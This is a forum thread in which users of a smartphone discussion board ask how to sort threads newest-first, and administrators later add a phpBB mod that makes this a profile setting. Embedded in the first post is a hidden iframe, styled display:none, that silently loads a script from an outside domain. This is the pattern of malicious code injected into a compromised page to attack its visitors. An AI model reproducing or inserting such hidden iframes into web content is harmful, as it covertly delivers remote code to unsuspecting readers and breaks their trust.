+ Reply to Thread
Page 1 of 2 1 2 LastLast

Sorting the boards by Newest first instead of Oldest first

Is there a way I can default these boards to come up Newest first instead of Oldest first? I know I can go to the bottom of the first screen of a thread and change it to Newest first, but I would like to set the default under my profile to make it always come up Newest first.

I know it is something small, but it would save some keystrokes to be able the entries since the last time you looked at that thread. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

That's interesting....for me it defaults to newest first. You might want to try private messaging jazz or jimmyjoe about your situation.
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

Yep, newest for me too.

newest first

[quote:8b31845975="Markito Burrito"]Yep, newest for me too.[/quote:8b31845975]

me three!

I have tried email and PM to JimmyJoe, I haven't heard anything back from him. Anyone else got any ideas how to have the threads shown newest first?

Thanks.

RamblinWreck

Mine defaults to oldest first also. If you find out anything let me know. Thanks.

Looks like it requires a mod to phpBB to have it user selectable in his/her profile.

http://www.phpbb.com/mods/downloads/index.php?t=sub_pages&amp;cat=6
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

So why do some users see it Newest first and others see it Oldest first? Does it depend on when you joined SmartPhoneSource? What will it take for the admins to load the MOD to the board to allow the users to select how they want to see the threads (Oldest or Newest first)?

Thanks.

RamblinWreck

No, it doesn't seem to matter when you joined. I've been a member here for just over 1 year (you can see it under my log-in name), and the discussion forums have ALWAYS defaulted to oldest post first, both on the old website and this latest incarnation of it.
    -- EMu

Where are the admins for the boards

Where are the admins?

Several posts in here are asking for their input, but none of the admins are responding!

Sorry for the lack of response on our part.... due to time constraints, Jimmyjoe has been unable to access his email or pm's recently, and I have been out of town and also unable to access the board. I'll look into the sorting issue and get back with everyone.....
    --Jazz--

looks like alex found the key..... i've got the mod downloaded and ready for jimmyjoe to take care of
    --Jazz--

Thanks Jazz!

We were just getting concerned since you guys are normally around the boards when we need ya!!!

Keep up the great work!

RamblinWreck

Any update on when this MOD will be available? I am still seeing all threads oldest first instead of newest first. I checked the profile to see if there was a selection there that this MOD is supposed to setup to allow us to set how we want to see the threads.

Thanks.

RamblinWreck

Sorry for the delay... Should be coming up shortly... have to find time to work on the server....
    again, sorry for the delay
    --Jazz--

Thanks, Jazz! Can't wait to be able to change the way I see the threads!!

RamblinWreck

Saw the announcements about the new MOD being available. Changed my profile, and it works like a charm!

Jazz &amp; JimmyJoe, thanks for the help. The board just keeps getting better and better!

RamblinWreck

Administrator
    didnt you guys know you could just tap the arrow next to the subject and it owuld take yuo to the newest post. i actually like that better than having the newest posts come up first. :

[quote:5aefc8e50e="marctronixx"]didnt you guys know you could just tap the arrow next to the subject and it owuld take yuo to the newest post. i actually like that better than having the newest posts come up first. :[/quote:5aefc8e50e]

That hasn't been working for me for two days now. I get a page that says there is nothing in this thread.

Gary

[quote:c6306404d2]That hasn't been working for me for two days now. I get a page that says there is nothing in this thread.
    Gary
    [quote:c6306404d2]marctronixx wrote:
    didnt you guys know you could just tap the arrow next to the subject and it owuld take yuo to the newest post. i actually like that better than having the newest posts come up first. [/quote:c6306404d2][/quote:c6306404d2]

Hi Gary;
    Apparently using the arrow to go to the newest post only works when you have the "sort by newest post first" option selected under your profile. If you have your profile set up to sort oldest posts first, then clicking on the arrow for most recent post gives you an error screen.
    - Archnemysis